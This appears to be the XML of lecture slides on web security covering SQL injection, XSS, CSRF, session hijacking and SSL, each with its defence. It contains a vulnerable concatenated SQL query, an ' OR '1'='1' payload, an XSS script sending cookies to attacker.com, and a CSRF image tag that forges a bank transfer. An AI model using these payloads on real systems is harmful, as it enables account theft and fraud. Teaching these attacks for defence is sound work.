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7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2" r:id="rId17"/>
    <p:sldId id="31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62" d="100"/>
          <a:sy n="62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26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SQL Injection Attacks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log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07" y="1726607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0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SQL Injection Attacks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089" y="1674673"/>
            <a:ext cx="82555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String query = "SELECT * FROM users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dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>		WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> ='"+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> + "'" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t/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dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>			" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>AND password='" + password + "'";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Statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>stmt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smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>= </a:t>
            </a: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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>connection.createStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>ResultSet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rs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stmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(query);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2650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SQL Injection Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="sq-AL" sz="28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dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>* FROM users 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='admin' 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AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>='123' OR '1'='1'</a:t>
            </a:r>
          </a:p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 smtClean="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2017-06-15 at 12.45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" y="3500620"/>
            <a:ext cx="8291711" cy="28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0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SQL Injection Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="sq-AL" sz="28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138" y="1600200"/>
            <a:ext cx="80800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Always use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>! 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err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>PreparedStatement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stmt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dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>connection.prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>		"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>* FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>users </a:t>
            </a:r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WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>=? AND password=?")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err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>stmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>stmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(2, password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>ResultSet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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>rs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stmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>();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778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Cross Site Scripting(XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="sq-AL" sz="28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138" y="1600200"/>
            <a:ext cx="8080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on Facebook, attacker posts this on wall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>= ‘http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>steal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> = ‘ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/script&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" i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now, when other user displays Facebook page...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script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>sends her cookies to attacker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could </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>get server-side private data too! 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2404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XSS Mitigations</a:t>
            </a:r>
            <a:endParaRPr lang="sq-AL" sz="28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138" y="1600200"/>
            <a:ext cx="80800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escape all HTML tags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Java doesn’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>do it by default :-(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escape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dangerous tags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called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>‘blacklisting’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very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>hard to get it right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accept certain tags with well-tested parser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called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>‘whitelisting’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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>good solution 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2404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Cross Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr lang="sq-AL" sz="28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138" y="1321702"/>
            <a:ext cx="8080032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on attacker’s site, include hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>call:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>mybank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>	amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>=1000&amp;destination=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>attackersAcct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>	width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>="0" height="0" /&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" i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when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>other user loads attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>page...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hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>call transfers her money to the attacker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can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>use all her credentials (session, cookies)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combine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>with XSS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attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>can place call on a trusted site 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2404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CSRF Mitigation</a:t>
            </a:r>
            <a:endParaRPr lang="sq-AL" sz="28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138" y="1321702"/>
            <a:ext cx="8080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challenge/response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CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>, password reentry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inconvenient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>for client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secret token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generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>a token for the session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add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>it to all URLs (but then exposed)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put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>in hidden form field (then only POSTs) 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8894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Security</a:t>
            </a:r>
            <a:endParaRPr lang="sq-AL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Obvious Threats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Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Telnet 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FTP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HTTP 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MySQL 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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft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0990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Cookies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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>HTTP/1.x 200 OK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Date: Wed, 25 Jul 2012 15:00:00 EST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Server: Apache/2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X-Powered-By: PHP/5.3.3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Expires: Thu, 19 Nov 1981 08:52:00 GMT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Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache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b="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Set-Cookie: PHPSESSID=5899f546557421d38d74b659e5bf384f; path=/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Set-Cookie: secret=12345</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1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Vary: Accept-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Encoding,User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>-Agent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Content-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>gzip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Content-Length: 261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Keep-Alive: timeout=1, max=100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Connection: Keep-Alive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Content-Type: text/html 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6089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 Hijacking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 smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Physical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Access </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Packet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Sniffing </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>XSS 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3614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Session Hijacking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5138" y="1600200"/>
            <a:ext cx="85813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Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Defenses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Hard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>-to-guess session keys? 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Rekey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>?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Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>IP address? 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Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>? 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spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft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380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SSL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Screen Shot 2017-06-15 at 3.40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7" y="2452197"/>
            <a:ext cx="8534029" cy="14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Public-Key Cryptography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Screen Shot 2017-06-15 at 3.46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5" y="1504601"/>
            <a:ext cx="8333490" cy="41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Diffie-Hellman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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="Screen Shot 2017-06-15 at 3.47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6" y="1479177"/>
            <a:ext cx="8244362" cy="4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28507</TotalTime>
  <Words>214</Words>
  <Application>Microsoft Macintosh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646</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-02-15T19:28:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-17T16:49:45Z</dcterms:modified>
</cp:coreProperties>
</file>